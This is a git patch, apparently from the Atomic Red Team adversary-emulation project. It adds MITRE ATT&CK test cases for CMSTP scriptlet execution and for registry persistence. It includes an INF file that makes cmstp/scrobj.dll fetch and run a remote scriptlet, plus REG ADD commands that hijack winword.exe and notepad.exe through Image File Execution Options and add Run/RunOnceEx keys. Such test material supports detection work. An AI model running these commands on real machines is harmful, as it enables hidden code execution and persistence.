From 92ab19d77301b618eaf886a1185ea63b95b4bf8e Mon Sep 17 00:00:00 2001 From: api0cradle Date: Tue, 17 Apr 2018 11:58:38 +0200 Subject: [PATCH] Created T1191 and T1183, added technique to T1060 --- Windows/Execution/CMSTP.md | 14 +++++++++++ Windows/Payloads/CMSTP.inf | 16 +++++++++++++ Windows/Payloads/CMSTP.sct | 23 +++++++++++++++++++ .../Image_File_Execution_Options_Injection.md | 15 ++++++++++++ .../Registry_Run_Keys_Start_Folder.md | 5 +++- 5 files changed, 72 insertions(+), 1 deletion(-) create mode 100644 Windows/Execution/CMSTP.md create mode 100644 Windows/Payloads/CMSTP.inf create mode 100644 Windows/Payloads/CMSTP.sct create mode 100644 Windows/Persistence/Image_File_Execution_Options_Injection.md diff --git a/Windows/Execution/CMSTP.md b/Windows/Execution/CMSTP.md new file mode 100644 index 00000000..67a3035a --- /dev/null +++ b/Windows/Execution/CMSTP.md @@ -0,0 +1,14 @@ +## CMSTP + +MITRE ATT&CK Technique: [T1191](https://attack.mitre.org/wiki/Technique/T1191) + +### Scriptlet execution + + cmstp.exe /s CMSTP.inf + +## Test Script + +[CMSTP.INF](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/CMSTP.inf) +[CMSTP.SCT](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/CMSTP.sct) + + diff --git a/Windows/Payloads/CMSTP.inf b/Windows/Payloads/CMSTP.inf new file mode 100644 index 00000000..d0012c86 --- /dev/null +++ b/Windows/Payloads/CMSTP.inf @@ -0,0 +1,16 @@ +; Author: @NickTyrer - https://twitter.com/NickTyrer/status/958450014111633408 + +[version] +Signature=$chicago$ +AdvancedINF=2.5 + +[DefaultInstall_SingleUser] +UnRegisterOCXs=UnRegisterOCXSection + +[UnRegisterOCXSection] +%11%\scrobj.dll,NI,https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/CMSTP.sct + +[Strings] +AppAct = "SOFTWARE\Microsoft\Connection Manager" +ServiceName="Yay" +ShortSvcName="Yay" \ No newline at end of file diff --git a/Windows/Payloads/CMSTP.sct b/Windows/Payloads/CMSTP.sct new file mode 100644 index 00000000..697938ed --- /dev/null +++ b/Windows/Payloads/CMSTP.sct @@ -0,0 +1,23 @@ + + + + + + + + + + + + + + diff --git a/Windows/Persistence/Image_File_Execution_Options_Injection.md b/Windows/Persistence/Image_File_Execution_Options_Injection.md new file mode 100644 index 00000000..72fc2d41 --- /dev/null +++ b/Windows/Persistence/Image_File_Execution_Options_Injection.md @@ -0,0 +1,15 @@ +# Image File Execution Options + +MITRE ATT&CK Technique: [T1183](https://attack.mitre.org/wiki/Technique/T1183) + +## Debugger + +REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\winword.exe" /v Debugger /d "C:\folder\AtomicRedTeam.exe" + + +## GlobalFlags + +REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v GlobalFlag /t REG_DWORD /d 512 +REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v ReportingMode /t REG_DWORD /d 1 +REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v MonitorProcess /d "C:\folder\AtomicRedTeam.exe" + diff --git a/Windows/Persistence/Registry_Run_Keys_Start_Folder.md b/Windows/Persistence/Registry_Run_Keys_Start_Folder.md index a1d415ec..6c99dc4b 100644 --- a/Windows/Persistence/Registry_Run_Keys_Start_Folder.md +++ b/Windows/Persistence/Registry_Run_Keys_Start_Folder.md @@ -2,11 +2,14 @@ MITRE ATT&CK Technique: [T1060](https://attack.mitre.org/wiki/Technique/T1060) -## Reg Add +## Reg Add 1 REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /t REG_SZ /F /D "C:\Path\AtomicRedTeam.exe" +## Reg Add 2 + + REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "C:\Path\AtomicRedTeam.dll" ## PowerShell